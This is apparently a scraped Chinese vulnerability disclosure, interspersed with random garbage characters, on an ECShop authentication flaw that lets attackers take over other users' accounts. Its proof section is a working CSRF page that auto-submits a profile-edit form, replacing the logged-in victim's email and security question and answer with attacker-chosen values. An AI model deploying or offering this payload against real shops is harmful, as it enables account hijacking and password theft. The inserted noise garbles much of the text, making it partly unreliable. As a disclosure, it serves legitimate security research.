简要描述:2 [* b3 Y/ ]' i- e! }
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
$ C5 R* H2 H0 c+ [) U! o6 {
: l, I/ i( S$ A0 a7 y5 ADemo For:http://www.wooyun.org/bug.php?action=view&id=395
0 V( ]) R8 H: e* @: C$ v
) w6 D. o& y3 K# j/ l, ?详细说明:
+ A0 M2 T$ _8 h1 e' I利用csrf和xss可以突破官方所说的“障碍”5 ^$ J2 o8 s7 I
xss版本已经有人说明
- b' l" k, Z4 e' K这里给出csrf版本
* o% K6 [8 U0 l& i: @7 r
+ _$ C' E0 `7 i6 j! H: D; v漏洞证明:
0 v! {" f3 N! K: Y: w3 S<html>
& N5 W$ K% |3 R3 W; q: ^<body>
$ B/ C9 l, [- _1 F/ s! _6 Z<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
% F3 _# ~6 `4 V% y' z7 }& E/ u<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
# I2 M, c+ W; o9 J' N* ~<INPUT TYPE="text" NAME="act" value="act_edit_profile">
+ I' s: \" L9 X6 V: x& B* o3 ~<INPUT TYPE="text" NAME="sel_question" value="ecshop">4 d$ l2 G- Y" d. m
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">5 z. c, A0 \; m& b/ H" L
</body>( S0 C% r; D3 N5 C+ C- G' _
<script>! V( T0 q2 \7 V& h
document.forms[0].submit();' s7 |8 u* ~6 C; n4 k, [5 H* \
</script>
/ _" A, J: _$ ~& Y</html>8 w. F* I" x. V. N/ l4 ?
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失: c9 B4 A) |: [/ n I' Z. q
) u' a# G% t( u2 `% `
|